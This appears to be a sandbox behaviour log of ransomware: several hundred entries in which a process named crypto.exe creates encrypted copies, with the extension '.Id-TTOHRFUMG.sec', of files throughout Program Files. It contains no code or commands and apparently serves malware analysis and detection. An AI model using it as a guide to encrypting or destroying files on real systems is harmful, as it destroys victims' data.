File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_snow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util-lookup.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00006_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Aspect.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Singapore.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBBTN.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0229389.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BULLETS.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_bkg.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\gadget.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\search_background.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\ba.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00453_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_decreaseindent.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WHITEBOX.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\LETTHEAD.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Whitehorse.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21512_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16ImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jpeg.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Status Report.fdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libmirror_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Tunis.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\awt.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107484.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01239K.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21296_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14538_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\FLYER11.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\scenesscroll.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\STSLIST.CHM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN082.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libsimple_channel_mixer_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\34.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0301076.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Rankin_Inlet.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00998_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN054.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-j2se-1.0.2.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Samara.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.IT.XML.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\XDPFile_8.ico	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01294_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\offset.ax.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\FindTrace.vstm.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\fontmanager.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\java.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0292278.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00395_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR45B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\7z.sfx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGPUNCT.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15135_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0240175.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh89.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\btn-back-static.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01130_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\NUMERIC.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\15x15dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Anadyr.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GROOVE_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)alertIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jcmd.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14868_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\add_up.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cancun.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107266.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR41F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\en-US\wmpnetwk.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MEDIA\APPLAUSE.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_duplicate_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00918_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_s.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115840.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\SEARCH.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\button_mid_over.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Issues.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome_pwa_launcher.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107718.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185800.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK.DEV.HXS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\VVIEWRES.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Macquarie.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01181_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Atlantic\Stanley.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199469.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15274_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSPUB.DEV_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_hyperlink.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-gibbous_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\notification_plugin.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099192.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0234687.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\PAB.SAM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\gadget.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\glow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\CircleSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-compat.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-uihandler.xml_hidden.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Regina.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EXPLR_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02198_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME37.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tongatapu.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSRTEDIT.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152558.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14533_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OISINTL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\OOFTMPL.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN048.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libschroedinger_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_floating.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Dublin.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-uihandler.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_divider_right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\alertIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jdb.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\New_York.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+3.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00135_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ACCDDSUI.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_Premium.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\EssentialResume.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\DESIGNER.ONE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libtextst_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\deploy\messages_fr.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\US_export_policy.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD08868_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR7B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Things\WHOOSH.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\WhiteDot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099162.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152878.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GRINTL32.REST.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGNAVBAR.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-time-l1-1-0.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Prague.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansDemiBold.ttf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Prague.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FINCL_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00670_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\DESKSAM.SAM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\SPANISH.LNG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\23.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Tirane.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jfxwebkit.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01146_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01180_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GROOVE.HXS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR44F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\js\jquery.jstree.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libadjust_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyclient.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dubai.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Nome.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Belgrade.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00524_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0240157.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18193_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_VelvetRose.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Lagos.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB1B.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\deploy\messages_it.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Tbilisi.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Port_Moresby.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01173_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SHOW_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18220_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN020.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_SelectionSubpictureB.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double_bkg.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PPTIRM.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0251871.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ro.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\MergeCompress.WTV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-outline.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02097_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\22.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21375_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\POSTITL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21304_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Samarkand.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Juneau.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImageMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
